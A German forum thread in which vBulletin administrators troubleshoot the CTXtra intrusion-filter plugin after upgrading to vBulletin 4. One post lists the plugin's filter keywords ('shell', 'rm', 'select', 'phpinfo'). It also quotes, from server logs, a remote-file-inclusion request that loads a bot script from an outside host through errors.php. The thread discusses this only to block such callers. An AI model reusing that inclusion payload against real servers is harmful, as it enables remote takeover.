CTXtra und problematisches VB 4.0.1

[Uwe]

Was bis VB 3.7.1 schön funzte bis CTXtra 1.6 Beta macht ab VB 4 ziemliche Probleme.

Ich hab den CTXtra 1.6 Beta unter VB 4.0.1 getestet.
Einbau wie gewohnt.
Der Testlauf war ziemlich broblematisch. Angefangen von Templatefehlermeldungen des VB im Browser bis zum Nichtanzeigen des Footer. Die Variable $ctxtra_footer bringt hier kein Ergebniss.
Auch "require_once('/DEIN-ABSOLUTER-PFAD/ctracker/ctracker.php');" zeigt kein Ergebniss. Die Testvariable ?ctxtra_dummy zeigt das der Tracker läuft. Es gibt aber mit der V. 1.6 massive Templatefehlermeldungen.
Ich habe dann mal den CTxtra_v1.5.08 getestet. Gleiches Ergebniss. Erst mit dem Aufruf "include_once("ctracker/ctracker.php");" ging es. Keine Templatefehler mehr. Der Test mit ?ctxtra_dummy war negativ. Aber der Zufall wollte es das ich mich Aussperrte. Also lief der Tracker. Nur scheinen die Variablen des Trackers nicht richtig durchzulaufen.

Hier meine Withelist:

type=deleted,
moderation.php,
order=desc,
order=asc,
dowhat=delete,
do=dodeletethreads,
do=phpinfo,
do=kill,
do=,
do=posts,
do=events,
search[ordering],
search[orderby],
do=delete,
goto=,
phpmyadmin,
phpinfo,
img src,
.conf,
delete,
g,
order,
order=,
deleteid=,
/mail,
php_,
",
<,
http://,
_post,
do=productkill,
do=productdelete,
do=server_modules,
server_,
productkill,
shell,
mail=,
request,
select,
www.,
df ,
df,
java,
rm,
',
,goto=

Der Test im Footer mit: <a href="'.$ctxtra_url.'" target="_blank">CTXtra</a> war auch negativ.
Also laufen die Variablen nicht durch.

Den Footer hab ich im Moment als HTML Zeile drin:

<div align="center"><a href="http://ctxtra.org/" target="_blank">Sicherheitssoftware: <b>CTXtra</b></a></div>

@ Martin und Schlumpfi.

Ich weiss das ihr im Moment wenig Zeit habt. Die Entwicklung der 1.6 scheint ja auch zu stagnieren. Ich würde nur ungern und bestimmt andere User auch auf das Script verzichten wollen. Geht die Entwicklung weiter bzw. wie kann man das fixen ? Bis VB 3.7.1 war alles easy. Ab VB 4 geht fast nix mehr. Schaut mal bitte die Withelist mit durch. Einiges gehört eigentlich geblacklistet denke ich, aber das VB ist sehr empflindlich wie es scheint.

@ Schlumpfi

Danke für die PN und die Antwort auf meinen letzten Post. Mich würde bei Gelegenheit interessieren wie du das mit den Scripten meinst, bzw. wie ich über die errors.php im CTXtra eine IP Blacklist erzeuge so das die auch nicht nur über die Einstiegsseite ausgesperrt werden. Aber das dürfte best. nur Serverseitig zu lösen sein denke ich. Dann wären die Hacker ausgesperrt

@ Martin

Mache bitte endlich das nervige Banner weg. Ich kriege nen Krampf in der rechten Hand wenn ich den immer schieben muss.

Gruss Uwe

[schlumpfi]

hallo uwe,

ja, im vb4 ist ziemlich viel recodet worden, das in der 3er schön funzte.
ehrlich gesagt hab ich mir die 4er noch nicht genau angesehen, man sieht aber dennoch einige grössere änderungen.

wie es mit ct1.6beta bzw der 1.5  aussieht, habe ich noch nicht getestet...

local hab ich einige ansätze, wie zb das mit dem footer umgangen... denke dieser würde auch in der vb4 funzen.

btw //
das angesprochene script  basiert auf ip catchen und das manuelle einschreiben in die liste via php.
alle aufrufe der errors.php werden in die ipliste des ctxtra eingetragen...
hier must du aber noch unterscheiden zwischen "böse" und "gut"

[Uwe]

@ schlumpfi

Danke für die Antwort.
Wäre interessant wie du den Footer machen würdest. Codesnippet ?
Hab mich nämlich an den Zähler im Footer gewöhnt

Zur error.php

Es ist nicht das Ziel zwischen "gut" und "böse" zu unterscheiden. Wer diese Datei aufruft bzw. versucht über eine Weiterleitung einen Schadcode nachzuladen wie ich aus den Apachelogs sehe der gehört Ausgesperrt. Die Syntax ist immer dieselbe: zb. h**p://meine.url/errors.php?error=http://takeover.fileave.com/bash**.txt?. Hab mir mal einige dieser texte geladen und angeschaut. Da wird eindeuitig ein Script nachgeladen welches Schadecode ausführt bzw. auf dem Server einen Both installiert und den Server fernsteuerbar macht. Solche Übeltäter gehören ausgesperrt. Wenn ich mich recht entsinne ist das Query ( URL ) schon im Tracker mit drin. Habs mal in den Logs gesehen. Da sind schon welche rausgeflogen hihi. Habs aber auch sogar mit meinem Script schon geschafft. Wie beschrieben, wenn das bei mir einer aufruft wird seine IP mit einer Datenbank verglichen welche Weltweite Ranges enthält ( 8 Mb gross). Länder kann man in einem Array in der errors.php eintragen. Es werden dann nur die IP der eingetragenen Länder verglichen. Im Moment sind 6 Länder geblacklistet. Deutschland auch. Es fliegen sozusagen fast alle bösen ( Italien, Frankreich, Ru, GER, Afrika, Niederlande ) raus. Von dort kamen du meisten versuchten Angriffe. Interessant wäre wenn du mir verraten würdest wie ich das mit dem CTXtra kombinieren kann. Da ergeben sich gute Möglichkeiten auch für andere solchen Verbrechern vorzubeugen. Gern auch per PN wenn du magst. Wenn Interesse besteht kannst du auch gern mein Script bekommen per PN oder ich lade mal zu einem Hoster hoch weil es hier als Anhang zu gross sein dürfte.

Gruss Uwe

[schlumpfi]

werd mal was vorbereiten, wenn ich etwas zeit habe...

[schlumpfi]

sorry, bin derzeit etwas stark im rl eingebunden...

werde es aber nachholen, sobald etwas mehr zeit ist.

mfg + danke für euer verständnis...

[blade5000]

gibt es schon das prog für vb 4.0.2 und wo finde ich das CTXtra für vb 4.0.2

mfg

[schlumpfi]

hallo,

muss mich leider entschuldigen, da ich beruflich im stress stecke und auch weiterhin bin.


werde aber trotzdem versuchen diese woche mich einmal um die offenen fragen zu kümmern...
einbauanleitungen werdet ihr dann in der download sektion finden, wenn verfügbar.

danke für eure geduld!!!

mfg